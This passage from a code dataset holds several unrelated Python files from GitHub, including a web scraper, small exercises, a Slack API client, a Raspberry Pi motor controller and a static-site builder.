soup.find('span', {'id': 'date'}).text\r\n    except:\r\n        date = ''\r\n    try:\r\n        market_cap = soup.find('div', {'class': 'font-bold text-right text-gray-1100'}).text\r\n    except:\r\n        market_cap = ''\r\n    try:\r\n        today_change = soup.find('div', {'class': 'w-full text-lg font-medium bg-red-200 p-8px text-gray-1100'}).text\r\n    except:\r\n        today_change = ''\r\n    try:\r\n        current_price = soup.find('div', {'class': 'text-sm font-medium lg:text-right lg:pl-8px text-gray-1100 p-8px lg:text-lg'}).text\r\n    except:\r\n        current_price = ''\r\n    \r\n    detail_transcripts_dict = {\r\n        'ticker': ticker,\r\n        'title': title,\r\n        'date': date,\r\n        'crawled_date':datetime.today(),\r\n        'market_cap': market_cap,\r\n        'current_price': current_price,\r\n        'today_change': today_change,\r\n        'link':url,\r\n        'content': content,\r\n    }\r\n    return detail_transcripts_dict\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    dict_ = get_transcripts_detailes('https://www.fool.com/earnings/call-transcripts/2023/02/09/xpo-xpo-q4-2022-earnings-call-transcript/')\r\n    print(dict_)\r\n    ","repo_name":"sinanazem/financial-data-collection","sub_path":"earnings-call/motly-fool/fool_earnings_calls_details.py","file_name":"fool_earnings_calls_details.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71969064044","text":"# coding:utf-8\n\nINF = float('inf')\n\n\ndef inpl(): return list(map(int, input().split()))\n\n\nN = int(input())\nN = str(N)\nans = ''\nfor n in N:\n    if n == '1':\n        ans += '9'\n    else:\n        ans += '1'\nprint(ans)\n","repo_name":"uni745e/AtCoder_answers","sub_path":"abc111/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71156422445","text":"def cadastrar_numero(codigo, defeito):\r\n    if(codigo not in mouses.keys()):\r\n        mouses[codigo]=[]\r\n    lista = mouses[codigo]\r\n    if (5 in lista):\r\n        mouses[codigo]=[5]\r\n        lista = mouses[codigo]\r\n        print(\"O mouse não possui defeitos \\n\")\r\n    elif(4 in lista):\r\n        mouses[codigo]=[4]\r\n        lista = mouses[codigo]\r\n        print(\"O mouse não pode ter mais defeitos pois está quebrado ou inutilizado \\n\") \r\n    elif (defeito in 
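The earnings-call scraper above repeats the same try/except fallback for every field; a small helper collapses the pattern. This is a sketch only — safe_text is a hypothetical helper, with selectors mirroring those used above:

from bs4 import BeautifulSoup

def safe_text(soup, tag, attrs, default=''):
    # Return the node's text, or default when the selector matches nothing.
    node = soup.find(tag, attrs)
    return node.text if node is not None else default

soup = BeautifulSoup('<h1 class="font-medium">Title</h1>', 'html.parser')
assert safe_text(soup, 'h1', {'class': 'font-medium'}) == 'Title'
assert safe_text(soup, 'span', {'id': 'date'}) == ''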
lista):\n print(\"Defeito já cadastrado \\n\")\n elif(defeito not in lista and len(lista) < 4):\n lista.append(defeito)\n mouses[codigo]=lista\n\ndef retira_defeito_opcoes(numero):\n for k, i in mouses.items():\n if k == numero:\n if 1 in i:\n listaValidaDef.pop(1, '')\n if 2 in i:\n listaValidaDef.pop(2, '') \n if 3 in i:\n listaValidaDef.pop(3, '') \n elif listaValidaDef == {}:\n print(\"Todas as opções de defeito foram utilizado\") \n return print(listaValidaDef.values())\n#dicionário mouse\nmouses = {}\n \n#dicionário defeitos \ndefeitos = {1: 'necessitam da esfera',\n 2: 'necessitam de limpeza',\n 3: 'necessitam troca do cabo ou conector',\n 4: 'estão quebrados ou inutilizados',\n 5: 'não tem defeito'}\n\nprint('\\nLista de defeitos: ')\nprint(\"1 - Necessita da esfera\\n2 - Necessita de limpeza\\n3 - Necessita troca do cabo ou conector\\n4 - Quebrado ou inutilizado\\n5 - Não tem defeito\")\n\n\nwhile True:\n listaValidaDef = {1: \"1 - Necessita de esfera\", 2: \"2 - Necessita de limpeza\", 3: \"3 - Necessita troca do cabo ou conector\"}\n num_id = int(input(\"Digite o número de identificação do Mouse: \"))\n if num_id == 0:\n break\n retira_defeito_opcoes(num_id)\n tp_def = int(input(\"Digite o tipo de defeito do mouse: \"))\n while True:\n if 0 < tp_def < 6:\n cadastrar_numero(num_id, tp_def)\n break\n else:\n tp_def = int(input(\"Número de identificação de defeito invalido... Digite novamente: \"))\n \n\nfor id, defeito in defeitos.items():\n print(\"\\n--- Identificação dos mouses que {} ---\".format(defeito))\n qt=0\n for mouse in mouses:\n if id in mouses[mouse]: \n print(\"{}\".format(mouse), end=' ')\n qt+=1\n if (qt == 1):\n print(\"\\nTotal: 1 mouse.\")\n elif (qt > 1):\n print(\"\\nTotal: {} mouses.\".format(qt))\n else:\n print(\"\\nNenhum\\nTotal: -----\")\n\nprint(\"\\n\") ","repo_name":"enzo-b-pagliacci/ComputionalThinkingUsingPython","sub_path":"exercício - 2508/manutencao_ex8_3.py","file_name":"manutencao_ex8_3.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42798371198","text":"import os\nimport os.path as osp\nimport json\nimport requests\n\nfrom .load_config import DotDict\n\n\ndef get_channels_list(config, save=True):\n\n URL = \"https://slack.com/api/conversations.list\"\n TOKEN = config.TOKEN\n\n headers = {\n 'Authorization': 'Bearer '+ str(TOKEN),\n }\n\n response = requests.get(URL, headers=headers)\n resdata = response.json()\n\n if not resdata[\"ok\"]:\n print(\"Error: {}. 
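One idiomatic alternative to the "create the key if missing" check at the top of cadastrar_numero above: collections.defaultdict builds the empty list on first access, so the membership test disappears.

from collections import defaultdict

mouses = defaultdict(list)
mouses[101].append(2)        # no explicit "if 101 not in mouses" needed
assert mouses[101] == [2]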
Cannot get channel list.\".format(resdata[\"error\"]))\n    \n    if save:\n        os.makedirs(osp.join(config.saveDir,config.workspace), exist_ok=True)\n        with open(osp.join(config.saveDir,config.workspace,\"channels.json\"), \"w\", encoding=\"utf8\") as f:\n            json.dump(resdata, f, indent=2, ensure_ascii=False)\n\n    return [DotDict(c) for c in resdata[\"channels\"]]","repo_name":"Tsukuweb/GetSlackHistory","sub_path":"utils/get_channels_list.py","file_name":"get_channels_list.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26550706644","text":"from django.urls import path\nfrom doodle.views import PostsListView, PostDetailView, CreatePost, DeletePost\n\n\napp_name = 'doodle'\nurlpatterns = [\n    path('', PostsListView.as_view(), name='index'),\n    path('post/<int:pk>', PostDetailView.as_view(), name='post_detail'),\n    path('post/create', CreatePost.as_view(), name='create_post'),\n    path('post/delete/<int:pk>', DeletePost.as_view(), name='delete_post')\n]\n","repo_name":"gladunvv/doodle-blog","sub_path":"app/doodle/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11801124428","text":"# Lab3-Synchronous\r\nimport numpy as np\r\nimport multiprocessing as mp\r\nfrom time import time\r\n\r\nprint(\"Number of processors: \", mp.cpu_count())\r\n\r\n# Parallelizing using Synchronous execution type\r\n\r\nif __name__ == \"__main__\":\r\n    # Prepare data (This is the problem statement)\r\n    np.random.RandomState(100)\r\n    arr = np.random.randint(0, 10, size=[200000, 5])\r\n    data = arr.tolist()\r\n    data[:5]\r\n    \r\n    # Non-parallel solution\r\n    def howmany_within_range(row, minimum, maximum):\r\n        # Return how many numbers lie within maximum and minimum in a given row\r\n        count = 0\r\n        for n in row:\r\n            if minimum <= n <= maximum:\r\n                count = count + 1\r\n        return count\r\n    \r\n    results = []\r\n    \r\n    for row in data:\r\n        results.append(howmany_within_range(row, minimum=4, maximum=8))\r\n    \r\n    print(results[:10])\r\n    \r\n    #> [3, 1, 4, 4, 4, 2, 1, 1, 3, 3]\r\n    \r\n    # Parallel solution (pool.apply(), pool.map() and pool.starmap())\r\n\r\n    # This is Pool.apply()\r\n    # 1) Initialize multiprocessing.Pool()\r\n    pool = mp.Pool(mp.cpu_count())\r\n\r\n    # 2) pool.apply() the defined function howmany_within_range()\r\n    results = [pool.apply(howmany_within_range, args=(row, 4, 8)) for row in data]\r\n\r\n    # 3) Close the pool\r\n    pool.close()\r\n\r\n    print(results[:10])\r\n    #> [3, 1, 4, 4, 4, 2, 1, 1, 3, 3]\r\n    \r\n    # This is Pool.map()\r\n    # 1) Edit the function of howmany_within_range\r\n    def howmany_within_range_rowonly(row, minimum=4, maximum=8):\r\n        count = 0\r\n        for n in row:\r\n            if minimum <= n <= maximum:\r\n                count = count + 1\r\n        return count\r\n    \r\n    pool = mp.Pool(mp.cpu_count())\r\n    \r\n    \r\n    results = pool.map(howmany_within_range_rowonly, [row for row in data])\r\n    \r\n    # 3) Close the pool\r\n    pool.close()\r\n    \r\n    print(results[:10])\r\n    #> [3, 1, 4, 4, 4, 2, 1, 1, 3, 3]\r\n    \r\n    # This is Pool.starmap()\r\n    pool = mp.Pool(mp.cpu_count())\r\n\r\n    # 1) pool.map() the defined function howmany_within_range()\r\n    results = pool.starmap(howmany_within_range, [(row, 4, 8) for row in data])\r\n\r\n    # 2) Close the pool\r\n    pool.close()\r\n\r\n    print(results[:10])\r\n    #> [3, 1, 4, 4, 4, 2, 1, 1, 3, 
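get_channels_list above reads only the first page that conversations.list returns; the Slack Web API paginates with response_metadata.next_cursor. A hedged sketch of cursor-based pagination against the same endpoint (token handling and error reporting kept minimal):

import requests

def iter_channels(token):
    url = 'https://slack.com/api/conversations.list'
    headers = {'Authorization': 'Bearer ' + str(token)}
    params = {'limit': 200}
    while True:
        data = requests.get(url, headers=headers, params=params).json()
        if not data.get('ok'):
            break  # surface data['error'] in real code
        yield from data.get('channels', [])
        cursor = data.get('response_metadata', {}).get('next_cursor')
        if not cursor:
            break
        params['cursor'] = cursor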
3]\r\n","repo_name":"mohdelfariz/distributed-parallel","sub_path":"Lab3-synchronous.py","file_name":"Lab3-synchronous.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"42414021219","text":"#!/usr/bin/env python3\n# 52digest.py\n\nimport re\nimport sys\n\n# Write a program that performs an EcoRI digest on the SARS-COV2 genome\n# The program should have 2 arguments\n# 1. The genome file\n# 2. The restriction pattern\n# The output should be the sizes of the restriction fragments\n\n\n#isolate genome from data file\nfilename = sys.argv[1]\nrefrag = sys.argv[2]\ngenome = ''\nwith open(filename) as fp:\n for line in fp.readlines():\n line = line.rstrip() #make into continuous line\n if 'ORIGIN' in line: #genome starts after the word origin\n genome = ''\n else:\n line = line.split()[1:]\n genome += ''.join(line)\n#look for all of the restriction patterns 'gaattc' in genome\nbefore = 0\nfor match in re.finditer(refrag, genome):\n size = match.start() - before\n before = match.start()\n print(size)\n\"\"\"\npython3 52digest.py ../Data/sars-cov2.gb gaattc\n1160\n10573\n5546\n448\n2550\n2592\n3569\n2112\n1069\n\"\"\"\n","repo_name":"tiffsiu/homework","sub_path":"52digest.py","file_name":"52digest.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40741118283","text":"import json\nimport re\nimport os\n\nfrom FoolDonkeyAssignment import pdx_logic, \\\n pdx_replace_dict\nfrom danteng import Danteng\nfrom paradox_parser import ParadoxParser\n\n# 处理本地化文件\n# 对蠢驴思维做处理,防止找不到对应的文字\n\n\n# 读取所有中英文本地化文本\ndef load_i18n(base_path, purge):\n obj_path = 'i18n.obj'\n if (not purge) and os.path.exists(obj_path):\n temp = Danteng.load_obj(obj_path)\n return dict(temp[0]), dict(temp[1])\n\n zhcn_path = 'localisation\\\\simp_chinese'\n zhcn_path_mod = r'L:\\python_working_dir\\stellaris\\localisation'\n en_path = 'localisation\\\\english'\n # 读取本地化文档\n i18n_zhcn_map = dict()\n i18n_en_map = dict()\n\n Danteng.log('----------英文文本----------')\n for filename in os.listdir(os.path.join(base_path, en_path)):\n if filename[-4:] == '.yml':\n i18n_en_map.update(_load_i18n(os.path.join(base_path, en_path, filename)))\n\n i18n_zhcn_map.update(i18n_en_map)\n\n Danteng.log('----------中文文本----------')\n for filename in os.listdir(os.path.join(base_path, zhcn_path)):\n if filename[-4:] == '.yml':\n i18n_zhcn_map.update(_load_i18n(os.path.join(base_path, zhcn_path, filename)))\n\n Danteng.log('----------修正文本----------')\n for filename in os.listdir(zhcn_path_mod):\n if filename[-4:] == '.yml':\n i18n_zhcn_map.update(_load_i18n(os.path.join(zhcn_path_mod, filename)))\n\n Danteng.save_obj((i18n_zhcn_map, i18n_en_map), obj_path)\n return i18n_zhcn_map, i18n_en_map\n\n\ndef load_synced(base_path, purge):\n obj_path = 'i18n.obj'\n if (not purge) and os.path.exists(obj_path):\n temp = Danteng.load_obj(obj_path)\n return dict(temp[0]), dict(temp[1])\n\n zhcn_path = base_path\n en_path = base_path\n\n # 读取本地化文档\n i18n_zhcn_map = dict()\n i18n_en_map = dict()\n\n for filename in os.listdir(os.path.join(base_path, en_path)):\n if filename[-4:] == '.yml' and filename[-7:] != '_SC.yml':\n i18n_en_map.update(_load_i18n(os.path.join(base_path, en_path, filename)))\n\n i18n_zhcn_map.update(i18n_en_map)\n\n for filename in os.listdir(zhcn_path):\n if filename[-7:] == '_SC.yml':\n i18n_zhcn_map.update(_load_i18n(os.path.join(zhcn_path, 
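Two small refinements to the Pool patterns shown in Lab3 above: a with-statement guarantees the pool is torn down even when an exception is raised, and map() accepts a chunksize argument that cuts inter-process overhead when there are many small tasks. A sketch of the same workload:

import multiprocessing as mp

def howmany_within_range(row, minimum=4, maximum=8):
    # Count the values of `row` that fall inside [minimum, maximum].
    return sum(minimum <= n <= maximum for n in row)

if __name__ == '__main__':
    data = [[1, 5, 9, 4, 7]] * 1000
    with mp.Pool(mp.cpu_count()) as pool:
        results = pool.map(howmany_within_range, data, chunksize=100)
    print(results[:5])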
filename)))\n\n Danteng.save_obj((i18n_zhcn_map, i18n_en_map), obj_path)\n return i18n_zhcn_map, i18n_en_map\n\n\ndef _load_i18n(path):\n i18n = ParadoxParser(path)\n return i18n.get_data()[0]\n\n\n# 替换掉以下几个蠢驴规则:\n# * MOD_开头的\n# * \\$(.*?)\\$ 文字变量\ndef replace(in_map):\n out_map = dict()\n for key in in_map:\n # 替换掉 '$(.*?)$'\n findall = re.findall(r'\\$(.*?)\\$', in_map[key])\n for find_key in findall:\n if find_key == 'RESOURCE':\n break\n if find_key in pdx_replace_dict:\n in_map[key] = in_map[key].replace('$%s$' % find_key, '$%s$' % pdx_replace_dict[find_key])\n find_key = pdx_replace_dict[find_key]\n if find_key in in_map:\n new_text = in_map[find_key]\n in_map[key] = in_map[key].replace('$%s$' % find_key, new_text)\n elif find_key + '_01' in in_map:\n new_text = in_map[find_key + '_01']\n in_map[key] = in_map[key].replace('$%s$' % find_key, new_text)\n all_text = in_map[key]\n for i in range(2, 99):\n temp_key = '_%02d' % i\n new_key = key + temp_key\n if find_key + temp_key in in_map:\n all_text +=' 或 '\n new_text = in_map[find_key + temp_key]\n temp_text = in_map[key].replace('$%s$' % find_key, new_text)\n out_map[new_key] = temp_text\n all_text +='\\\"' + temp_text + '\\\"'\n # Danteng.log(key + '|' + new_key + '|' + out_map[new_key])\n else:\n break\n in_map[key] = all_text\n # Danteng.log('多种情况:' + key + '|' + in_map[key])\n elif find_key + '_1' in in_map:\n new_text = in_map[find_key + '_1']\n in_map[key] = in_map[key].replace('$%s$' % find_key, new_text)\n elif len(find_key)>=5 and find_key[0:-5] + '_1_desc' in in_map:\n new_text = in_map[find_key[0:-5] + '_1_desc']\n in_map[key] = in_map[key].replace('$%s$' % find_key, new_text)\n # elif find_key in fool_donkey_dict:\n # in_map[key] = in_map[key].replace('$%s$' % find_key, fool_donkey_dict[find_key])\n # else:\n # Danteng.log('原文没找到' + find_key + '\\t\\t\\t\\t' + key + ': ' + in_map[key])\n z = 1\n # in_map[key] = in_map[key].replace('\\\\n', '
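The replace() loop above expands $key$ references with repeated str.replace calls; a single re.sub pass with a lookup callback is a compact equivalent that leaves unresolved keys untouched. Sketch with a hypothetical lookup table:

import re

def expand(text, table):
    # Replace each $KEY$ with table[KEY]; keep the original token if the key is unknown.
    return re.sub(r'\$(.*?)\$', lambda m: table.get(m.group(1), m.group(0)), text)

assert expand('ship $NAME$', {'NAME': 'colony ship'}) == 'ship colony ship'
assert expand('keep $MISSING$', {}) == 'keep $MISSING$'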
')\n # # 替换掉 'MOD'开头的\n if key[0:4] == 'MOD_' or key[0:4] == 'mod':\n out_map[key[4:].lower()] = in_map[key]\n # Danteng.log(key + '|' + key[4:].lower() + '|' + zhcn_map[key[4:].lower()])\n # else:\n # out_map[key] = in_map[key]\n # Danteng.log(in_map[key])\n for key in pdx_replace_dict:\n if pdx_replace_dict[key] in in_map:\n out_map[key] = in_map[pdx_replace_dict[key]]\n else:\n out_map[key] = pdx_replace_dict[key]\n Danteng.log('没找到' + pdx_replace_dict[key])\n for key in in_map:\n if key != key.lower() and (not key.lower() in in_map) and (not key.lower() in out_map):\n out_map[key.lower()] = in_map[key]\n in_map.update(out_map)\n return in_map\n\n\ndef processor(path, synced_path='', purge=True):\n # 读取本地化文档\n i18n_zhcn_map, i18n_en_map = load_i18n(path, purge)\n\n for i in range(2):\n i18n_en_map = replace(i18n_en_map)\n i18n_zhcn_map = replace(i18n_zhcn_map)\n\n for item in pdx_logic:\n if pdx_logic[item]['value'] in i18n_zhcn_map:\n pdx_logic[item]['value'] = i18n_zhcn_map[pdx_logic[item]['value']]\n if synced_path != '':\n zhcn_map, en_map = load_synced(synced_path, purge)\n zhcn_map.update(i18n_zhcn_map)\n en_map.update(i18n_en_map)\n i18n_zhcn_map = zhcn_map\n i18n_en_map = en_map\n return i18n_zhcn_map, i18n_en_map\n\n\nif __name__ == '__main__':\n data_path = 'F:\\\\Steam\\\\steamapps\\\\common\\\\Stellaris\\\\'\n\n # 输出json方便查看\n cn_map, en_map = processor(data_path, True)\n cn_json = json.dumps(cn_map, ensure_ascii=False)\n with open('F:\\\\PycharmProjects\\\\stellaris_data_processer\\\\json\\\\cn.json', 'w', encoding='UTF-8') as f:\n f.write(cn_json)\n\n en_json = json.dumps(en_map, ensure_ascii=False)\n with open('F:\\\\PycharmProjects\\\\stellaris_data_processer\\\\json\\\\en.json', 'w', encoding='UTF-8') as f:\n f.write(en_json)\n z = 1\n","repo_name":"HuijiWiki/qunxing","sub_path":"stellaris_data_processer/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":6902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74663782124","text":"#!/usr/bin/env python\n\n\n# Import required libraries\n\nfrom flask import Flask, render_template_string, request # Importing the Flask modules\nfrom time import sleep # Import sleep module from time library \nimport sys\nimport time\nimport RPi.GPIO as GPIO\n'''\nGPIO.setmode(GPIO.BCM)\n\n#Define GPIO signals to use\n# Set all pins as output\nGPIO.setup(18,GPIO.OUT)\nGPIO.setup(22,GPIO.OUT)\nGPIO.output( 18, GPIO.False )\nGPIO.output( 22, GPIO.LOW )'''\n#GPIO.cleanup()\n#p#rint(\"Setting up pins\")\n\n#GPIO.setup(18,GPIO.OUT) # step control pin = 18\n#GPIO.output(18, False) \n#GPIO.setup(22,GPIO.OUT) # direction control pin = 22\n#GPIO.output(22, False)\n\nclass runMotor():\n def __init__(self):\n self.previous_height = 0\n self.time_arr = []\n #self.opposite_direction = False\n self.previous_direction = False\n def initialize_motor(self):\n \n # Use BCM GPIO references instead of physical pin numbers\n GPIO.setmode(GPIO.BCM)\n\n # Define GPIO signals to use\n # Set all pins as output\n print(\"Setting up pins\")\n GPIO.setup(18,GPIO.OUT) # step control pin = 18\n GPIO.output(18, False) \n GPIO.setup(22,GPIO.OUT) # direction control pin = 22\n GPIO.output(22, False)\n\n def cleanup_motor(self):\n GPIO.output( 18, GPIO.LOW )\n GPIO.output( 22, GPIO.LOW )\n GPIO.cleanup()\n \n def return_to_base_height(self):\n #Return motor to base height\n if self.previous_height>=0:\n self.change_motor_height(self.previous_height,False)\n else:\n print ('Error - Motor no 
longer knows its position')\n \n def change_motor_height(self,height,moves_up):\n self.time_arr.append(time.time())\n if len(self.time_arr)>2 and (self.time_arr[-1] - self.time_arr[-2])<2:\n return\n\n #reinitialize motor\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(18,GPIO.OUT) # step control pin = 18\n GPIO.setup(22,GPIO.OUT) # direction control pin = 22\n \n # Initialise variables\n WaitTime = 0.05 # changed to 500ms\n stepCounter = 0\n stepsToRotate = height*1000*(1/0.3) # convert meters to steps (1 step = 0.3mm)\n #stepsToRotate = 898\n \n print(\"Steps to rotate received:\",int(stepsToRotate))\n print(\"moves_up\",moves_up)\n \n #Initialize if motor moves up or down and set GPIO\n if moves_up == True and stepsToRotate!=0:\n GPIO.output( 22, GPIO.LOW) # high is clockwise and low is counterclockwise\n self.previous_height = self.previous_height+height\n \n elif moves_up is False and stepsToRotate!=0:\n GPIO.output(22,GPIO.HIGH)\n self.previous_height = self.previous_height-height\n else:\n return\n \n if moves_up !=self.previous_direction:\n height = height +0.02\n \n #Move motor determined amount of steps\n for stepCounter in range(abs(int(stepsToRotate))):\n #for pin in range(0, 4):\n GPIO.output(18, GPIO.HIGH)\n time.sleep(WaitTime/2)\n GPIO.output(18, GPIO.LOW)\n time.sleep(WaitTime/2)\n \n #Clean GPIO output\n GPIO.output( 18, False )\n GPIO.output( 22, False )\n self.previous_direction = moves_up\n \n return height\n'''\nmotor = runMotor()\nmotor.initialize_motor()\ntime1 = time.time()\nmotor.change_motor_height(0.01,False)\n'''\n#tim'''e.sleep(5)\n#motor.change_motor_height(0.03,True)\n#print (time.time()-time1)\n","repo_name":"anne-mei/fydp-neofeed","sub_path":"pi_code/for_motors/runMotor.py","file_name":"runMotor.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"43479078294","text":"from jinja2 import Environment, FileSystemLoader, Markup\n#import PyRSS2Gen as RSS2\nfrom pyatom import AtomFeed\nimport codecs\nimport gettext\nimport locale\nfrom math import ceil\nfrom datetime import datetime\nfrom struri import slugify, link_to, strip_html_tags#\nfrom meta import Meta#\nfrom mulang import Mulang#\nimport shutil\nimport os\n\n\nclass Builder:\n \"\"\"Site building process manager.\n \n .. todo:: Remove redundant code using a universal method for\n retrieve and gather the data; and use subclasses.\n\n .. todo:: Manage better with timezones. Make sure if there is no\n timezone the default is always UTC, for posts info, and\n both feeds pub. dates.\n\n .. todo:: Fix the way the variables are passed on the init. 
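The steps-to-rotate conversion inside change_motor_height above (metres to millimetres at 0.3 mm of travel per step) is easy to pull out into a pure, testable helper; a sketch:

MM_PER_STEP = 0.3  # from the code above: 1 step = 0.3 mm

def height_to_steps(height_m):
    # Convert a height in metres to a whole number of stepper steps.
    return int(round(height_m * 1000.0 / MM_PER_STEP))

assert height_to_steps(0.03) == 100   # 30 mm of travel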
Grouping\n by lists or dictionaries could simplify much the\n constructor.\n\n i.e.:\n\n uri [ 'canonical': 'http://where.my_site.is/', 'base': '' ]\n wlocale = [ 'locale': \"utf-8\", 'encoding': \"en_US\" ]\n date_fmts = [ 'long': \"%c\", 'short': '%Y-%M-%D', 'mini': \"%B, %Y\",\n site = [ 'name': \"My Blog\", 'description': \"Nice description.\",\n 'author': \"Me\", 'max_entries': \"10\", 'feed_fmt': \"atom\"]\n\n def __init__(self, uri, wlocale, site, date_fmts,\n template_values, extra_dirs, infile_ext,\n verbose=True):\n \"\"\"\n\n def __init__(self, canonical_uri, base_uri='', deploy_dir='_build',\n template_values=dict(), wlocale='en_US', encoding='utf-8',\n max_entries=10, date_format_entries='%c',\n date_format_list='%Y-%m-%d', date_format_home='%Y-%m-%d',\n extra_dirs=None, site_name='', site_description='Feed',\n site_author='', feed_format='atom', infile_ext='.mkdn',\n verbose=True):\n \"\"\"Constructor.\n\n :param template_values: Common values in all templates\n :type template_values: dict\n :param wlocale: Working locale; locale of the generated site\n :type wlocale: str\n \"\"\"\n self.max_entries = max_entries\n self.template_values = template_values\n self.wlocale = wlocale\n self.encoding = encoding\n self.base_uri = base_uri\n self.deploy_dir = os.path.join(deploy_dir, base_uri)\n self.date_format_list = date_format_list\n self.date_format_entries = date_format_entries\n self.date_format_home = date_format_home\n self.canonical_uri = canonical_uri\n self.site_name = site_name\n self.site_author = site_author\n self.feed_format = feed_format\n self.site_description = site_description\n self.extra_dirs = extra_dirs\n self.infile_ext = infile_ext\n self.verbose = verbose\n\n # Set locale for the site.\n self.old_locale = locale.getlocale()\n self.current_locale = locale.setlocale(locale.LC_ALL,\n self.wlocale)\n\n # Constants-like (I don't like this approach)\n #source dirs.\n self_dir = os.path.dirname(os.path.realpath(__file__))\n self.locale_dir = os.path.join(self_dir, 'locale')\n self.builtin_templates_dir = os.path.join(self_dir, 'templates')\n\n #dest. dirs.\n self.home_cont_dir = 'page' # home paginator\n self.tags_dir = 'tags' # one dir. per tag\n\n #src. & dest. dirs.\n self.pages_dir = '.' 
# other pages such as 'About'\n self.entries_dir = 'posts' # where posts are\n self.static_dir = 'static' # CSS and JS\n self.templates_dir = 'templates' # Layout base template\n\n\n def __del__(self):\n \"\"\"Destructor.\"\"\"\n # Restores locale\n return locale.setlocale(locale.LC_ALL, self.old_locale)\n\n\n def render_template(self, template, output_data, values):\n \"\"\"Renders a template using Jinja2.\n\n :param template: Template to use\n :type template: str\n :param output_data: File where the data is saved\n :type output_data: str\n :return: Generated HTML of the output data\n :rtype: str\n \"\"\"\n trans = gettext.translation('default', self.locale_dir,\n [self.current_locale]) # locale has to be set!\n env = Environment(extensions=['jinja2.ext.i18n'],\n loader=FileSystemLoader([self.templates_dir,\n self.builtin_templates_dir]))\n env.install_gettext_translations(trans)\n env.globals['slugify'] = slugify # <- adds `slugify` to Jinja2\n env.globals['strip_html_tags'] = strip_html_tags\n template = env.get_template(template)\n html = template.render(**values)\n output_file = codecs.open(output_data, mode=\"w\",\n encoding=self.encoding)\n output_file.write(html)\n\n return html\n\n\n def entry_link_prefix(self, entry):\n \"\"\"Compute entrie final path.\"\"\"\n meta = Meta(Mulang(os.path.join(self.entries_dir, entry),\n self.encoding).metadata())\n date = meta.date('%Y-%m-%d')\n date_arr = date.split('-')\n path = os.path.join(str(self.entries_dir),\n str(date_arr[0]),\n str(date_arr[1]),\n str(date_arr[2]))\n return path\n\n\n def gen_entry(self, infile, date_format='%c'):\n \"\"\"Generate a HTML entry from its Mardkdown counterpart.\n\n :param infile: Markdown file to parse\n :type infile: str\n :param date_format: Date format for entry\n :type date_format: str\n :return: Generated HTML\n :rtype: str\n \"\"\"\n inpath = os.path.join(self.entries_dir, infile)\n ml = Mulang(inpath, self.encoding)\n meta = Meta(ml.metadata())\n content_html = ml.html(verbose=self.verbose)\n\n timezone = meta.date('%z')\n if timezone:\n # to html5 timezone conv.\n timezone = timezone[:3] + ':' + timezone[3:]\n datehtml = meta.date('%Y-%m-%dT%H:%M') + timezone\n\n values = self.template_values.copy()\n values['entry'] = { #append\n 'title': meta.title(),\n 'raw_title': strip_html_tags(meta.title()),\n 'private': meta.private(),\n 'comments': meta.comments(),\n 'date': meta.date(date_format),\n 'datehtml': datehtml,\n 'tags': meta.tag_list(),\n 'content': content_html }\n outfile = link_to(slugify(strip_html_tags(meta.title())),\n os.path.join(self.deploy_dir,\n self.entry_link_prefix(infile)))\n return self.render_template('entry.html.j2', outfile, values)\n\n\n def gen_entries(self, date_format='%c'):\n \"\"\"Generate all entries.\n\n :param date_format: Date format for entry\n :type date_format: str\n \"\"\"\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n self.gen_entry(filename, date_format=date_format)\n\n\n def gen_home(self, max_entries_per_page=10, date_format='%Y-%m-%d'):\n \"\"\"Generate home page, and subpages.\n\n :param max_entries: Max. 
entries per page\n :type max_entries: int\n :param date_format: Date format for home page\n :type date_format: str\n \"\"\"\n entries = list()\n total_entries = 0\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n inpath = os.path.join(self.entries_dir, filename)\n meta = Meta(Mulang(inpath, self.encoding).metadata())\n\n private = meta.private()\n title = meta.title()\n summary = meta.summary()\n date = meta.date(date_format)\n date_idx = meta.date('%Y-%m-%d %H:%M:%S')\n uri = link_to(slugify(strip_html_tags(title)),\n os.path.join('/', self.base_uri,\n self.entry_link_prefix(filename)),\n makedirs=False, justdir=True)\n\n # Generate archive\n if not private:\n total_entries += 1\n val = { 'title': title, 'summary': summary,\n 'date': date, 'date_idx': date_idx,\n 'uri': uri }\n entries.append(val)\n\n # Sort chronologically descent\n entries = sorted(entries, key=lambda k: k['date_idx'],\n reverse=True)\n\n total_pages = ceil(total_entries / max_entries_per_page)\n values = self.template_values.copy()\n\n # FIXME :: Merge this scenario with the following loop\n #Generate 'index.html' even when there are no posts\n if total_entries == 0:\n outfile = link_to('', self.deploy_dir)\n self.render_template('entries.html.j2', outfile, values)\n\n # Home page (and subsequent ones)\n for cur_page in range(1, total_pages + 1):\n min_page = (cur_page - 1) * max_entries_per_page\n max_page = cur_page * max_entries_per_page\n\n values['entries'] = entries[min_page:max_page]\n values['cur_page'], values['total_pages'] = cur_page, total_pages\n\n if cur_page == 1:\n # the home page, the \"index.html\" of the site\n outfile = link_to('', self.deploy_dir)\n else:\n # subsequent pages other that the first\n outfile = link_to(str(cur_page),\n os.path.join(self.deploy_dir,\n self.home_cont_dir))\n 